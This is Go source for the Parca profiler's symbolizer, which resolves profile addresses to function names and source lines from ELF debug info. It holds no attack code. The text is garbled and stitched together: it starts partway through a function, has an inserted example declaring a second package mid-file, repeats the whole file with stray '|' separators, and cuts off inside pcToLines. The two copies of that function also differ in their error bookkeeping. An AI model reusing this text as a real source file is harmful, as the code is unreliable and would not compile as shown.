locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
		if len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for the given mapping's
// build ID and uses it to symbolize the given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the line number of the given PC while keeping the track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
		// First failed attempt for this address; keep any existing counts for
		// other addresses of the same build ID.
		if _, ok := s.symbolizationAttempts[key]; !ok {
			s.symbolizationAttempts[key] = map[uint64]int{}
		}
		s.symbolizationAttempts[key][addr] = 1
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
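// Illustrative sketch, not part of the original source: one way a caller might
// construct and run the symbolizer. It assumes already-built implementations of
// DebuginfoMetadata, pb.MetastoreServiceClient, and DebuginfoFetcher, and it
// assumes github.com/parca-dev/parca/pkg/symbolizer as this package's import
// path; treat the concrete values below as placeholders.
package example

import (
	"context"
	"os"
	"time"

	"github.com/go-kit/log"
	"github.com/prometheus/client_golang/prometheus"

	pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
	"github.com/parca-dev/parca/pkg/symbolizer"
)

func runSymbolizer(
	ctx context.Context,
	metadata symbolizer.DebuginfoMetadata,
	metastore pb.MetastoreServiceClient,
	fetcher symbolizer.DebuginfoFetcher,
) error {
	s := symbolizer.New(
		log.NewNopLogger(),
		prometheus.NewRegistry(),
		metadata,
		metastore,
		fetcher,
		os.TempDir(), // scratch directory for fetched debuginfo files
		128,          // batch size; 0 means a single, unbounded batch
		symbolizer.WithDemangleMode("simple"),
		symbolizer.WithAttemptThreshold(3),
	)
	// Run repeats the symbolization cycle every interval until ctx is cancelled.
	return s.Run(ctx, 10*time.Second)
}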
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
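	// Page through unsymbolized locations: each response's MaxKey seeds the next
	// request's MinKey, and the loop ends on an empty batch (or after a single
	// pass when batchSize is 0).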
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
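// Illustrative sketch, not part of the original file: sample inputs for the
// check above. The helper name and file paths are hypothetical.
func exampleUnsymbolizableMappings() {
	for _, m := range []*pb.Mapping{
		{File: "[vdso]"},         // bracketed pseudo-file: unsymbolizable
		{File: "[vsyscall]"},     // likewise
		{File: "/dev/dri/card0"}, // GPU device node: unsymbolizable
		{File: "/usr/bin/parca"}, // regular binary: symbolizable
	} {
		fmt.Println(m.File, UnsymbolizableMapping(m))
	}
}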
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
		if len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
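	// Keep liners reused this round by removing them from the old cache; whatever
	// remains was not needed anymore, so it is closed and its temp file deleted
	// before the cache is swapped.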
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
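	// Second pass in the same iteration order: the shared counter i pairs each
	// line with the function ID returned by GetOrCreateFunctions above.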
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
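	// Recount now that the PC range is cached: addresses outside the range are
	// excluded, so the mapping may turn out to need no further work.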
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
		// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil { | return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the source lines for the given PC while keeping track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
